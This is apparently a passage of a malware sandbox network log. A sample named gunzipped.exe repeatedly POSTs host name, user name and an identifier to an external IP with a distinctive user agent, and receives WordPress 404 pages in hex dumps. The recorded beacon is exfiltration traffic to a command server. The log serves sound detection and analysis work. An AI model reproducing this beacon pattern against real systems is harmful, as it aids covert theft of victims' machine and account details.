                          Apr 17, 2024 03:18:46.054536104 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:46.054575920 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:46.054615021 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:46.054656029 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:46.054694891 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          75192.168.2.549789136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:46.390927076 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:46.594094038 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:47.542049885 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:46 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:47.542165041 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:47.542186975 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:47.542207003 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:47.542248011 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:47.542285919 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:47.542324066 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:47.542360067 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:47.542396069 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:47.542439938 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          76192.168.2.549790136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:47.882152081 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:48.089839935 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:49.029202938 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:47 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:49.029257059 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:49.029294968 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:49.029333115 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:49.029373884 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:49.029412031 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:49.029450893 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:49.029489040 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:49.029526949 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
